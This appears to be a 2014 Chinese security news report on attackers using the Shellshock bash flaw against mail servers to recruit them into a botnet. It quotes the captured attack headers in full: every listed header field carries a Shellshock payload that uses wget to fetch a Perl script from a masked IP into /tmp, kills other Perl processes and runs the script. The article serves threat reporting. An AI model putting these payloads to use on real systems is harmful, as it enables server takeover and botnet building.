攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。

安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个 Perl脚本，成为僵尸网络的一部分。邮件消息头的构成是：

1. Shellshock spam October 2014 （IP地址已隐藏）
2. ===
3. To:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
4.  
5. References:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
6.  
7. Cc:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
8.  
9. From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
10.  
11. Subject:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
12.  
13. Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
14.  
15. Message-ID:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
16.  
17. Comments:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
18.  
19. Keywords:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
20.  
21. Resent-Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
22.  
23. Resent-From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
24.  
25. Resent-Sender:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

原文发布时间：2014-10-29

本文来自云栖合作伙伴“linux中国”